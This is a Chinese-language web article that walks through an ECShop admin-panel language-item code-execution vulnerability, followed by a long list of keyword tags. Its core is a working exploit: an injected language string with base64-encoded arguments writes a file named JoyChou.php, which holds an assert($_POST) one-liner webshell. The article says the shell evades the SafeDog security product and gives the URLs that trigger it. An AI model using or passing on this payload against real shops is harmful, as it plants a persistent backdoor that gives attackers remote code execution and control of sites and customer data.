ecshop后台语言项执行漏洞详解

2016-09-07 22:02 来源：www.chinab4c.com 作者：ecshop专家

该漏洞需要能登录ecshop后台权限，简单修改下语言项目，即可在网站植入木马后门。以下是详细分析

1.登陆到ecshop台后，选择模板管理，语言项编辑，搜索“用户信息”

为什么要搜索“用户信息”，还可以搜索其它的吗？

答案是搜索languages\\zh_cn\\user.php文件里任何一个变量都可以

2.添加如下后门，将用户信息改为

用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}

即生成一个JoyChou.php文件，内容为（可以过安全狗的一句话哦）：

<?php
assert(
$_POST[x]
);
?>

3.访问user.php即可产生shell（不用注册登录账户）

http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php
或
http://localhost/ECShop_V2.7.3_UTF8_release0411/languages/zh_cn/user.php

(责任编辑：chinab4c)

相关标签：

常用插件

ecshop字体下载 ecshop笔记本 ecshop横版 ecshop降序 ecshop物流公司 ecshop勾字 ecshop手机评测 ecshop罪恶都市 ecshop语言学习 ecshop店长 ecshop者神 ecshop最低价 ecshop浪差 ecshop量子 ecshop摊位 ecshop燒包 ecshop魔法师 kingshard kingshard插件 weedfs ecshop小京东小京东bug 小京东购物车 ec助理数据导入导出网站 ecshop跳转 sqlserver 商城求解！！

ecshop专家 ecshop网尚购物 ecshop杀毒软件 ecshop插口 ecshop当当网 ecshop批量导入商品属性 ecshop投诉 ecshop出错 hdwiki的block ecshopdiscus ecshopFCK ecshop特别 ecshop部落格 ecshop打包 ecshopgoda ecshop客人 ecshop伦敦时间 ecshop好人 ecshop表语 ecshop万网独享微信基础 ecshop凤凰网 ecshop合租 ecshop乘以 ecshop淘宝登录 ecshop日程 ecshop已确认 ecshop网站维护 ecshopNEWS ecshop是什么意思